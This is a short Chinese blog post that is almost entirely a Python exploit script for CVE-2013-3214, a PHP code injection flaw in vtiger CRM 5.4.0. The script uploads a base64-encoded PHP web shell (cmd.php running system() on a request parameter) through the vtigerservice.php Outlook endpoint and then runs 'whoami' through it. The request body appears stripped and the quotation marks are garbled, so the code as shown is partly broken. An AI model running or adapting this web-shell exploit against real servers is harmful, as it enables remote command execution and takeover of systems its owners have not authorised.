# CVE-2013-3214 vtiger CRM 5.4.0 PHP代碼注入漏洞
==EXP==
#!/usr/bin/env python3 import requests from base64 import b64encode # parameters depend on environment. host = '192.168.85.133' port = 8888 uri = '/' url = f'http://{host}:{port}{uri}vtigerservice.php?service=outlook' headers = {'Content-Type': 'text/xml', 'charset': 'UTF-8'} payload = """ "; $cmd = ($_REQUEST['cmd']); system($cmd); echo "
“;
die;
}
?>
“””
encoded_payload = b64encode(payload.encode()).decode()
filename = “cmd.php”
data = f”””
“””
# send the requests
print(“Sending …”)
print(data)
requests.post(url, headers=headers, data=data)
print(“Test command whoami …”)
resp = requests.get(f’http://{host}:{port}{uri}{filename}?cmd=whoami’)
print(resp.text)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容